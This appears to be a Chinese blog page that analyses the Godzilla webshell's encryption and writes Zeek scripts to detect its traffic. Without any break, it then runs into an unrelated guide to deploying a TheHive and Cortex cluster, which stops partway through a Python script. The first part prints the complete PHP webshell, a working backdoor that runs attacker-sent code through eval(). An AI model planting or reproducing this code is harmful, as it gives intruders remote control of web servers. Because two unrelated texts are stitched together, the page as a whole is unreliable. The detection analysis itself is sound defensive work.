0%

写在前面

Godzilla(哥斯拉):

image-20211211235918877

​ 身高:50米

​ 体重:2万吨

​ 攻击方式:放射热线、白热光、袋鼠踢、投掷、搏击、尾鞭

​ 一种生活在侏罗纪和白垩纪之间的罕见海栖爬虫类和陆生兽类的中间形态生物的残存个体,因氢弹试验的影响而出现。最初在太平洋上出现并袭击货船,后经大户岛在东京登陆,造成巨大破坏。最终在东京湾被芹泽博士发明的水中氧气破坏素(核能氧气素/氧气破坏者)杀死。

​ 以下文章将简述如何捕获该怪兽,首先派大量直升机去恶魔岛劫持另一体型巨大但温和许多的巨兽:金刚。然后让金刚抗伤害人类偷袭就好。本篇完!

image-20211211235918877

实在编不下去了,来点正经的吧。。。


Godzilla(哥斯拉)是一款优秀的WebShell权限管理工具,其特点有:

  • 哥斯拉全部类型的Shell均过市面所有静态查杀

  • 哥斯拉流量加密过市面全部流量WAF

  • 哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的

Zeek (原名:Bro) 是一个开源的网络流量分析器。许多运营商将Zeek作为网络安全监控器(NSM),支持对可疑或恶意活动的调查。Zeek还支持安全领域以外的广泛的流量分析任务,包括性能测量和故障排除。其特点有:

  • 深度分析:Zeek带有许多协议的分析器,可以在应用层进行高级语义分析。

  • 适应性和灵活性:Zeek的特定领域脚本语言可以实现特定地点的监控策略,这意味着它不受限于任何特定的检测方法。

  • 高效:Zeek以高性能网络为目标,在各种大型网站上运行。

  • 高度的状态性:Zeek对其监控的网络保持广泛的应用层状态,并提供网络活动的高级档案。

环境

  • Godzilla: v4.0.1
  • Zeek:v4.1.0
  • WebShell:
    • PHP XOR BASE64
    • JSP AES BASE64

源码分析

PHP XOR BASE64

客户端

  • 基础配置:URL、密码、密钥、加密器等信息。如下图所示:
    • 密码:和蚁剑、菜刀一样,密码就是POST请求中的参数名称。例如,在本例中密码为Happy,那么Godzilla提交的每个请求都是Happy=XXX这种形式。以下称为pass
    • 密钥:用于对请求数据进行加密,不过加密过程中并非直接使用密钥明文,而是计算密钥的MD5值,然后取其前16位用于加密。以下为称为key
    • 有效载荷:生成对应类型的WebShell
    • 加密器:控制WebShell的加密方式
    • 请求配置:主要用于自定义HTTP请求头,以及在最终的请求数据前后额外再追加一些扰乱数据,进一步降低流量的特征

image-20211130173607606

  • 由于Godzilla的源码作者并未做混淆,所以通过jadx工具很方便就能得到源码。

    对于PHP XOR BASE64加密方式来说,首位各附加了16位的校验字符串(pass + key 计算的MD5值)。

1
2
3
4
5
6
7
8
9
10
public class PhpXor implements Cryption {
public void init(ShellEntity context) {
this.shell = context;
this.http = this.shell.getHttp();
this.key = this.shell.getSecretKeyX().getBytes();
this.pass = this.shell.getPassword();
String findStrMd5 = functions.md5(this.pass + new String(this.key)); // 校验字符串
this.findStrLeft = findStrMd5.substring(0, 16); // 前16位MD5
this.findStrRight = findStrMd5.substring(16); // 后16位MD5
}
  • 请求加密
    • 对于明文数据使用key进行按位异或->base64编码->url编码,实现数据加密;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
  public byte[] encode(byte[] data) {
try {
return E(data);
} catch (Exception e) {
Log.error(e);
return null;
}
}

// 通过key按位异或
public byte[] E(byte[] cs) {
int len = cs.length;
for (int i = 0; i < len; i++) {
cs[i] = (byte) (cs[i] ^ this.key[(i + 1) & 15]);
}
return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
}
  • 响应解密

    • 首先调用findStr方法删除响应数据中的前后16位校验字符串;

    • 然后利用base64Decode方法解码字符串;

    • 最后使用key按位异或,实现数据解密;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
public byte[] decode(byte[] data) {
if (data == null || data.length <= 0) {
return data;
}
try {
return D(findStr(data));
} catch (Exception e) {
Log.error(e);
return null;
}
}

public byte[] D(String data) {
byte[] cs = functions.base64Decode(data);
int len = cs.length;
for (int i = 0; i < len; i++) {
cs[i] = (byte) (cs[i] ^ this.key[(i + 1) & 15]);
}
return cs;
}

public String findStr(byte[] respResult) {
return functions.subMiddleStr(new String(respResult), this.findStrLeft, this.findStrRight);
}

演示数据 - 数据解密

![image-20211201143236656](./Zeek-Detect-Godzilla-WebShell/示例数据 - 1.png)

服务端

PHP XOR BASE64 类型的加密Shell的服务器端代码如下,其中定义了encode函数,用于加密或解密请求数据。由于是通过按位异或实现的加密,所以encode函数即可用于加密,同时也可用于解密。整个Shell的基本执行流程是:服务器接收到Godzilla发送的第一个请求后,由于此时尚未建立session,所以将POST请求数据解密后(得到的内容为Shell操作中所需要用到的相关php函数定义代码)存入session中,后续Godzilla只会提交相关操作对应的函数名称(如获取目录中的文件列表对应的函数为getFile)和相关参数,这样哥斯拉的相关操作就不需要发送大量的请求数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='Happy';
$payloadName='payload';
$key='bdf2e45b317c4585';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

JSP AES BASE64

​ JSP WebShell 则采用了AES加密形式,AES加密的key。同样是计算密钥的MD5值,然后取其前16位用于加密。更深入的分析大家可以去参考,这并不是本文的重点。**【原创】哥斯拉Godzilla加密流量分析**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
public void init(ShellEntity context) {
this.shell = context;
this.http = this.shell.getHttp();
this.key = this.shell.getSecretKeyX();
this.pass = this.shell.getPassword();
String findStrMd5 = functions.md5(this.pass + this.key);
this.findStrLeft = findStrMd5.substring(0, 16).toUpperCase();
this.findStrRight = findStrMd5.substring(16).toUpperCase();
try {
this.encodeCipher = Cipher.getInstance("AES");
this.decodeCipher = Cipher.getInstance("AES");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));
this.payload = this.shell.getPayloadModule().getPayload();
if (this.payload != null) {
this.http.sendHttpResponse(this.payload);
this.state = true;
} else {
Log.error("payload Is Null");
}
} catch (Exception e) {
Log.error(e);
}
}

public byte[] encode(byte[] data) {
try {
return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(this.encodeCipher.doFinal(data)))).getBytes();
} catch (Exception e) {
Log.error(e);
return null;
}
}

public byte[] decode(byte[] data) {
try {
return this.decodeCipher.doFinal(functions.base64Decode(findStr(data)));
} catch (Exception e) {
Log.error(e);
return null;
}
}

特征提取

​ 结合上面的分析,传统通过静态特征的匹配方式已不在适用于Godzilla WebShell检测。不过,我们可以将多个特征进行结合实现一个检测的模型来对Godzilla PHP XOR BASE64 WebShell的检测。下面我们来列举一下检测特征:

  1. 频率

    Godzilla连接WebShell的时会在一次TCP会话中发起3次HTTP POST请求。

    image-20211206111919028

    ​ 注意看下uid均为CbhiAefsstFeAyCM6表示是一次TCP会话请求。

    image-20211206114412112

  1. 长度

    Godzilla虽然对传输时的payload进行了加密,但是初始连接时3次请求中的内容是固定的,所以通过XOR + BASE64编码后的长度是不变的。

    • 第一次请求长度(Value):52216

      ​ Godzilla加载payload.php文件内容作为payload数据,其中定义了Shell功能所需的一系列函数,Godzilla第一次连接Shell时,会将这些函数定义发送给服务器并存储在session中,后续的Shell操作只需要发送函数名称以及对应的函数参数即可。

    image-20211204004016084

    • 第一次响应长度:0

      image-20211204005107879

    • 第二次请求长度(Value):28

      • 密文: CQNGDVtRLFJcUmEwNTg1FgEVRg==
      • 明文:{'methodName': 'test'}

      image-20211204010342657

    • 第二次响应长度:64

      • 密文:e+06ZTQ1YjMxNKj7Mzhyv7gfMGU0NQ==
      • 明文:ok

      image-20211204011821599

    • 第三次请求长度(Value):40

      • 密文:CQNGDVtRLFJcUmE5NTg1BQEScARHXAFAeFkFWw==
      • 明文:{'methodName': 'getBasicsInfo'}

      image-20211204012318391注:第三次响应数据包,不可作为特征提取。因为每个服务器的基础信息不一样,所以返回内容长度也不一样。

  2. 内容

    有的小伙伴会奇怪,都已经加密了还能从内容上做哪些判断。其实还是可以有的,只不过并不是传统的“威胁特征”

    • 请求:3次请求中的key均相等,此例中为:Happy

    image-20211206111328799

    • 响应:响应数据包中首尾各16位数值可满足MD5的提取[a-z0-9]{16}.+[a-z0-9]{16},且2次响应包中的16位数值均相等

    image-20211206105322612

    image-20211206110509962

检测模型

image-20211208151817057

PHP XOR BASE64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
@load base/frameworks/sumstats

redef enum Notice::Type +=
{
WebShell_Godzilla_PHP_XOR_BASE64
};

## 使用Summary Statistics Framework(统计框架)对http请求进行测量。
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
{
if ( (c?$http) && (c$http?$status_code) && (c$http?$method) && (c$http?$client_body) )
{
if ( (c$http$status_code) == 200 && (c$http$method == "POST") )
{
local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri;
local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len);
## 第一步,创建一个观察器,将数据添加到观察器中。
SumStats::observe("godzilla_php_xor_base64_webshell_event", [$str=key_str], [$str=observe_str]);
}
}
}

event zeek_init()
{
## 第二步,根据指定的观察流进行处理,此处采用计算唯一值的方式。
local r1 = SumStats::Reducer($stream = "godzilla_php_xor_base64_webshell_event", $apply = set(SumStats::UNIQUE));
## 第三步,创建汇总统计,以便最终对其进行处理。例:当在3秒的时间窗内满足3次阈值将会执行以下逻辑;
SumStats::create([$name = "godzilla_php_xor_base64_webshell_event.unique",
$epoch = 3sec,
$reducers = set(r1),
$threshold = 3.0,
$threshold_val(key: SumStats::Key, result: SumStats::Result) =
{
return result["godzilla_php_xor_base64_webshell_event"]$num + 0.0;
},
$threshold_crossed(key: SumStats::Key, result: SumStats::Result) =
{
if ( result["godzilla_php_xor_base64_webshell_event"]$unique == 3 )
{
local sig1: bool = F;
local sig2: bool = F;
local sig3: bool = F;
local pass_str_set: set[string];
local md5_str_set: set[string];
local key_str_vector: vector of string = split_string(key$str, /#####/);

for ( value in result["godzilla_php_xor_base64_webshell_event"]$unique_vals )
{
local observe_str_vector: vector of string = split_string(value$str, /#####/);
local client_body = unescape_URI(observe_str_vector[1]);
local server_body = unescape_URI(observe_str_vector[2]);
local client_body_len = to_int(observe_str_vector[3]);
local offset = strstr(client_body, "=");
local client_body_value = client_body[offset: |client_body|];

## 获取请求参数
if (offset > 1)
## 本例中: Happy=CQNGDVtRLFJcUmEwNTg1FgEVRg%3D%3D
add pass_str_set[client_body[0: offset-1]];

## 响应体长度 > 0,提取首位各16字节并检查是否满足MD5格式
if (|server_body| > 0)
{
## 本例中: 52f0f23a94a8a3f0e+06ZTQ1YjMxNKj7Mzhyv7gfMGU0NQ==468e329e21eb39e8
local server_body_str = server_body[0: 16] + server_body[-16: ];
local server_body_md5 = find_all_ordered(server_body_str, /[a-zA-Z0-9]{32}/);
if (|server_body_md5| == 0)
return;
add md5_str_set[server_body_str];
}

## 请求体长度 > 52216 && 响应体长度 = 0
if ( (client_body_len > 52216) && (|server_body| == 0) )
sig1 = T;

## 请求体长度 = 28 && 响应体长度 = 64
if ( (|client_body_value| == 28) && (|server_body| == 64) )
sig2 = T;

## 请求体长度 = 40
if ( |client_body_value| == 40 )
sig3 = T;
}

if ( sig1 && sig2 && sig3 )
{
## 判断3次请求参数是否唯一
## 判断后2次提取的MD5值是否唯一
if ( (|pass_str_set| == 1) && (|md5_str_set| == 1) )
{
NOTICE([
$note=WebShell_Godzilla_PHP_XOR_BASE64,
$uid=key_str_vector[0],
$src=to_addr(key_str_vector[1]),
$dst=to_addr(key_str_vector[3]),
$msg=fmt("[+] Godzilla(PHP_XOR_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s", key_str_vector[1], key_str_vector[2], key_str_vector[3], key_str_vector[4], key_str_vector[5]),
$sub=cat("Godzilla traffic Detected")
]);
}
}
}
}
]);
}

JSP AES BASE64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
@load base/frameworks/sumstats

redef enum Notice::Type +=
{
WebShell_Godzilla_JSP_AES_BASE64
};

event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
{
if ( c?$http && c$http?$status_code && c$http?$method )
{
if ( (c$http$status_code) == 200 && (c$http$method == "POST") && (c$http?$client_body) )
{
local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri;
local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len);
SumStats::observe("godzilla_jsp_aes_base64_webshell_event", [$str=key_str], [$str=observe_str]);
}
}
}

event zeek_init()
{
local r1 = SumStats::Reducer($stream = "godzilla_jsp_aes_base64_webshell_event", $apply = set(SumStats::UNIQUE));
SumStats::create([$name = "godzilla_jsp_aes_base64_webshell_event.unique",
$epoch = 5sec,
$reducers = set(r1),
$threshold = 3.0,
$threshold_val(key: SumStats::Key, result: SumStats::Result) =
{
return result["godzilla_jsp_aes_base64_webshell_event"]$num + 0.0;
},
$threshold_crossed(key: SumStats::Key, result: SumStats::Result) =
{
if ( result["godzilla_jsp_aes_base64_webshell_event"]$unique == 3 )
{
local sig1: bool = F;
local sig2: bool = F;
local sig3: bool = F;
local pass_str_set: set[string];
local md5_str_set: set[string];
local key_str_vector: vector of string = split_string(key$str, /#####/);

for ( value in result["godzilla_jsp_aes_base64_webshell_event"]$unique_vals )
{
local observe_str_vector: vector of string = split_string(value$str, /#####/);
local client_body = unescape_URI(observe_str_vector[1]);
local server_body = unescape_URI(observe_str_vector[2]);
local client_body_len = to_int(observe_str_vector[3]);
local offset = strstr(client_body, "=");
local client_body_value = client_body[offset: |client_body|];

## 获取 WebShell Password Key
if (offset > 1)
add pass_str_set[client_body[0: offset-1]];

if (|server_body| > 0)
{
local server_body_str = server_body[0: 16] + server_body[-16: ];
local server_body_md5 = find_last(server_body_str, /[a-zA-Z0-9]{32}/);
add md5_str_set[server_body_md5];
}

## 请求体长度 > 48500 && 响应体长度 = 0
if ( (client_body_len > 48500) && (|server_body| == 0) )
sig1 = T;

## 请求体长度 = 64 && 响应体长度 = 76
if ( (|client_body_value| == 64) && (|server_body| == 76) && (server_body_str == server_body_md5) )
sig2 = T;

## 请求体长度 = 88
if ( |client_body_value| == 88 && (server_body_str == server_body_md5) )
sig3 = T;
}

## 判断3次请求体中Password Key 是否唯一、判断23次的响应体中的是否MD5是否唯一
if ( (|pass_str_set| == 1) && (|md5_str_set| == 1) )
if ( sig1 && sig2 && sig3 )
{
NOTICE([
$note=WebShell_Godzilla_JSP_AES_BASE64,
$uid=key_str_vector[0],
$src=to_addr(key_str_vector[1]),
$dst=to_addr(key_str_vector[3]),
$msg=fmt("[+] Godzilla(JSP_AES_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s", key_str_vector[1], key_str_vector[2], key_str_vector[3], key_str_vector[4], key_str_vector[5]),
$sub=cat("Godzilla traffic Detected")
]);
}
}
}
]);
}

模型验证

Godzilla v4 Detected

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Installing from GIT
$ git clone https://github.com/ntop/PF_RING.git

# Kernel Module Installation
$ cd /opt/PF_RING/kernel
$ make
$ sudo make install

# Running PF_RING
$ cd PF_RING/kernel
$ sudo insmod pf_ring.ko min_num_slots=65536 enable_tx_capture=0
# sudo insmod ./pf_ring.ko [min_num_slots=N] [enable_tx_capture=1|0] [ enable_ip_defrag=1|0]

# Drivers
$ ethtool -i eth1 | grep driver
driver: ixgbe

# Libpfring and Libpcap Installation
$ cd PF_RING/userland/lib
$ ./configure && make
$ sudo make install
$ cd ../libpcap
$ ./configure && make
$ sudo make install

# Application Examples
$ cd PF_RING/userland/examples
$ make
$ sudo ./pfcount -i zc:eth1
$ sudo ./pfsend -f 64byte_packets.pcap -n 0 -i zc:eth1 -r 5
1
2
3
4
$ git clone --recursive https://github.com/zeek/zeek
$ ./configure --with-pcap=/opt/PF_RING --enable-jemalloc
$ make -j4
$ sudo make install

背景

​ 随着企业安全建设的不断完善,信息安全的工作也进入了Happy苦逼)的运营阶段。谈起安全运营工作,自然避不开事件响应这个话题。对于安全事件响应而言,我们时常会需要进行跨部门的协作。并且在某些事件中,我们甚至需要进行持续的跟踪与排查。因此,在事件的响应过程中,对于每一个响应步骤的记录显得尤为重要。它可以帮助我们在事件解决后,将经验教训纳入其中,加强整体安全能力。另一方面从自动化的角度来说,我们也应该考虑如何将响应过程转换为可被复用的Playbook,用以快速应对攻击,从而缩短感染攻击到遏制攻击的时间。

下面来说说我这的痛点,或者也可以说是我们在运营过程中所需要解决的一些问题:

  • 如何在事件响应过程中记录每一个响应步骤所花费的时间?这些任务的处理时间,将会直接影响到我们后期MTTDMTTR的计算。
  • 如何从安全事件中提炼Playbook?对于重复可被流程化的过程,自动化才是王道啊。
  • 面对各种“”操作的攻击手法,如何提供更多可定制化的插件给安全分析人员使用,用以提升安全分析的效率?
  • 如何快速的与现有的安全设备进行联动,并及时止损。
  • 通常安全事件会涉及跨部门协作的情况,我们如何快速就此次事件展开分析并及时与协作部门之间同步事件进展。

安全事件响应平台 - TheHive

​ 我最终选择了*TheHive* 安全事件响应平台来协助我进行日常的安全运营工作。TheHive不同于SIEM这类的产品,它主要对接的是需要被真实响应的事件。个人粗略汇总了一下它的特点:

  • 融合协作TheHive将安全事件视作Case,提倡多人、跨部门之间的协作。通过分享机制,可以快速与协作部门之间同步安全事件进展。
  • 成本度量TheHive支持记录每个CaseTask的时间成本开销。可以帮助我们更好的去度量现有的MTTD、MTTR指标,也为我们后期去优化指标提供了重要的依据。
  • 快速响应:在事件响应的过程中,你会需要对已有的数据进行分析,并迅速提供补救措施来阻止攻击。TheHiveCortex组件支持对数据进行快速的分析,并将已确认的IoC自动化推送到现有的安全设备完成与SIEM、WAF、FW、EDR的联动。
  • 效率提升:对于可被流程化的响应过程,必然是需要自动化的,也就少不了日常Playbook的积累。那么,Playbook从何而来?我们可以采用TheHive去记录每一次的安全事件响应的过程,并通过Task的形式去拆分需要协作的事项以及响应的步骤,利用这种方式帮助我们去积累Playbook

TheHive集群部署

​ 由于篇幅的关系,这里主要介绍的是采用TheHive集群时需要调整的一些配置。至于如何安装TheHive,请参考:Step-by-Step guide。如果只是为了测试的话,可以直接用官网提供的Docker或者VM镜像。

​ 根据官方文档介绍,TheHive集群涉及4个部分。以下将会分别说明当采用TheHive集群时,TheHive、Cortex、Cassandra、Minio需要做的调整。

Thehive

​ 我们将节点1视为主节点,通过编辑/etc/thehive/application.conf文件来配置akka组件,如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
## Akka server
akka {
cluster.enable = on
actor {
provider = cluster
}
remote.artery {
canonical {
hostname = "<My IP address>"
port = 2551
}
}
# seed node list contains at least one active node
cluster.seed-nodes = [
"akka://application@<Node 1 IP address>:2551",
"akka://application@<Node 2 IP address>:2551",
"akka://application@<Node 3 IP address>:2551"
]
}

Cassandra

  • 集群配置

    • 使用以下参数更新配置文件:/etc/cassandra/cassandra.yaml
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    cluster_name: 'thp'
    num_tokens: 256
    authenticator: PasswordAuthenticator
    authorizer: CassandraAuthorizer
    role_manager: CassandraRoleManager
    data_file_directories:
    - /var/lib/cassandra/data
    commitlog_directory: /var/lib/cassandra/commitlog
    saved_caches_directory: /var/lib/cassandra/saved_caches
    seed_provider:
    - class_name: org.apache.cassandra.locator.SimpleSeedProvider
    parameters:
    - seeds: "<ip node 1>, <ip node 2>, <ip node 3>"
    listen_interface : ens160 # 监听的接口
    rpc_interface: ens160 # 监听的接口
    endpoint_snitch: SimpleSnitch
    • 删除文件 /etc/cassandra/cassandra-topology.properties
    1
    $ rm -rf /etc/cassandra/cassandra-topology.properties
  • 启动服务

    • 在每个节点上启动服务
    1
    $ service cassandra start
    • 查询集群状态
    1
    2
    3
    4
    5
    6
    7
    8
    9
    $ nodetool status
    Datacenter: datacenter1
    =======================
    Status=Up/Down
    |/ State=Normal/Leaving/Joining/Moving
    -- Address Load Tokens Owns (effective) Host ID Rack
    UN 192.168.199.35 449.33 KiB 256 100.0% 72e95db1-9c37-4a53-9312-76bd0b2e6ca7 rack1
    UN 192.168.199.36 631.65 KiB 256 100.0% 4051f9d4-91de-43e5-9a4a-c3da46417830 rack1
    UN 192.168.199.37 437.13 KiB 256 100.0% 8844626f-04c0-4dd3-855e-088935b8dc65 rack1
  • 初始化数据库

    • 修改数据库默认密码(默认账户密码:cassandra/cassandra
    1
    2
    3
    $ cqlsh th01 -u cassandra
    cassandra@cqlsh> ALTER USER cassandra WITH PASSWORD 'HelloWorld';
    cassandra@cqlsh> quit;
    • 确保所有节点上的用户账户都是一致的
    1
    2
    $ cqlsh <ip node X> -u cassandra
    cassandra@cqlsh> ALTER KEYSPACE system_auth WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 3 };
    • 创建名为thehiveKEYSPACE
    1
    cassandra@cqlsh> CREATE KEYSPACE thehive WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '3' } AND durable_writes = 'true';
    • 创建角色thehive,并授予thehive 权限(选择密码)
    1
    2
    cassandra@cqlsh> CREATE ROLE thehive WITH LOGIN = true AND PASSWORD = 'HelloWorld';
    cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE thehive TO 'thehive';
  • TheHive 相关配置

    由于最新的TheHive集群需要配合ElasticSearch进行索引,因此需要同步更新如下配置:

    • 更新/etc/thehive/application.conf配置
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    db.janusgraph {
    storage {
    ## Cassandra configuration
    backend: cql
    hostname: ["<ip node 1>", "<ip node 2>", "<ip node 3>"]
    username: "cassandra"
    password: "HelloWorld"
    cql {
    cluster-name: thp
    keyspace: thehive
    }
    }

    ## Index configuration
    index.search {
    backend: elasticsearch
    hostname: ["<es node 1>", "es node 2", "es node 3"]
    index-name: thehive
    # auth
    elasticsearch.http.auth.type=basic
    elasticsearch.http.auth.basic.username=elastic
    elasticsearch.http.auth.basic.password=HelloWorld
    # ssl
    elasticsearch.ssl.enabled=true
    elasticsearch.ssl.truststore.location=/etc/thehive/truststore.jks
    elasticsearch.ssl.truststore.password=HelloWorld
    }
    }

Minio

​ 由于我的文件存储是采用了Minio,所以这里需要配置一下。其实更简单的方式,你可以考虑使用S3

  • 创建目录
1
$ mkdir /opt/minio
  • 创建用户
1
$ adduser minio
  • 创建数据卷

    在每台服务器上至少创建2个数据卷

1
2
$ mkdir -p /srv/minio/{1,2}
$ chown -R minio:minio /srv/minio
  • 修改主机名
1
2
3
4
$ vim /etc/hosts
192.168.199.35 minio1
192.168.199.36 minio2
192.168.199.37 minio3
  • 安装
1
2
3
4
$ cd /opt/minio
$ mkdir /opt/minio/{bin,etc}
$ wget -O /opt/minio/bin/minio https://dl.minio.io/server/minio/release/linux-amd64/minio
$ chown -R minio:minio /opt/minio
  • 配置

    • 新建配置文件/opt/minio/etc/minio.conf
    1
    2
    3
    MINIO_OPTS="server --address :9100 http://minio{1...3}/srv/minio/{1...2}"
    MINIO_ACCESS_KEY="admin"
    MINIO_SECRET_KEY="HelloWorld"
    • 新建系统启动文件/usr/lib/systemd/system/minio.service
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    [Unit]
    Description=minio
    Documentation=https://docs.min.io
    Wants=network-online.target
    After=network-online.target
    AssertFileIsExecutable=/opt/minio/bin/minio

    [Service]
    WorkingDirectory=/opt/minio
    User=minio
    Group=minio
    EnvironmentFile=/opt/minio/etc/minio.conf
    ExecStart=/opt/minio/bin/minio $MINIO_OPTS
    Restart=always
    LimitNOFILE=65536
    TimeoutStopSec=0
    SendSIGKILL=no

    [Install]
    WantedBy=multi-user.target
  • 启动

1
2
3
$ systemctl daemon-reload
$ systemctl enable minio
$ systemctl start minio.service

注:这里记得确认一下权限的问题,权限不对的话会导致进程起不来。

  • 创建bucket

    Minio-1

    • 创建bucket

    Minio-2

  • 修改TheHive配置文件 /etc/thehive/application.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
## Attachment storage configuration
storage {
provider: s3
s3 {
bucket = "thehive"
readTimeout = 1 minute
writeTimeout = 1 minute
chunkSize = 1 MB
endpoint = "http://minio1:9100"
accessKey = "admin"
secretKey = "HelloWorld"
region = "us-east-1"
}
}
alpakka.s3.path-style-access = force

Cortex

  • 修改 Cortex 配置文件 /etc/cortex/application.conf

    这里注意,官方默认的配置文件有个小问题。当采用Elastic认证的时候需要将username修改为user,否则会报错。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
play.http.secret.key="QZUm2UgZYXF6axC"
search {
index = cortex
uri = "https://elasticsearch01:9200,elasticsearch02:9200,elasticsearch03:9200"
user = "elastic" # 修改username为user
password = "HelloWorld"
keyStore {
path = "/etc/cortex/truststore.jks"
password = "HelloWorld"
}
trustStore {
path = "/etc/cortex/truststore.jks"
password = "HelloWorld"
}
}

Analyzers and Responders

​ 由于在Cortex 3中实现了对dockerized分析器的支持,安装过程已经被大大简化。因此,我们不必纠结于安装插件时的Python或其他库依赖项这种头疼的问题。

  • 安装Docker
1
2
3
4
5
# Ubuntu 18.04
$ wget -O- https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$ add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
$ sudo apt-get update
$ sudo apt-get install docker-ce
  • Cortex账户运行Docker的权限
1
$ usermod -a -G docker cortex
  • 更新配置文件/etc/cortex/application.conf,启用analyzers.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
## ANALYZERS
#
analyzer {
urls = [
"https://download.thehive-project.org/analyzers.json" # 本次新增
"/etc/cortex/Cortex-Analyzers/analyzers"
]
}

# RESPONDERS
#
responder {
urls = [
"https://download.thehive-project.org/responders.json" # 本次新增
"/etc/cortex/Cortex-Analyzers/responders"
]
}

如何创建插件

​ 前面有说到Cortex组件默认已经集成了丰富的AnalyzersResponses插件,便于运营人员快速的对安全事件进行分析与响应。在实际使用过程中根据需求场景的不同,我们仍需要进行一些插件的定制化。如何创建插件,官网有很详细的文档介绍,请参考:How to Write and Submit an Analyzer。以下附上了部分新增的插件代码:

好了,废话少说,放“码”过来!!!

Analyzers - 插件

微歩在线

​ 由于我们已经购买了商业(微歩在线)威胁情报,所以我们也和TheHive进行了整合。

  • threatbook.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python3
# encoding: utf-8

import requests


class ThreatBookError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
self.message = message


class ThreatBook():
"""
Threat intelligence: Threat Book
https://x.threatbook.cn/nodev4/vb4/API
"""

def __init__(self, key):
self.key = key
self.ua = "HappyHunting"
self.session = requests.Session()
self.urls = {
'compromise': 'https://api.threatbook.cn/v3/scene/dns',
'reputation': 'https://api.threatbook.cn/v3/scene/ip_reputation'
}

def _request(self, url, params={}):
"""
Request an url
"""
headers = {'User-Agent': self.ua}
r = self.session.get(
url=url,
params=params,
headers=headers
)

'''
{
"response_code": -1,
"verbose_msg": "Invalid Access IP"
}
'''
if r.status_code != 200:
raise ThreatBookError(
'Invalid HTTP status code %i' % r.status_code)
if r.json()['response_code'] != 0:
raise ThreatBookError(r.json())
return r.json()

def parser_results(self, results):
for k, v in results.items():
intel = {
'ioc': k,
'malicious': v['is_malicious'],
'confidence': v['confidence_level'],
'tags': v['judgments']
}
return intel

def get_reputation(self, ioc):
"""Getting reputation IP"""
url = self.urls['reputation']
params = {
'apikey': self.key,
'resource': ioc
}
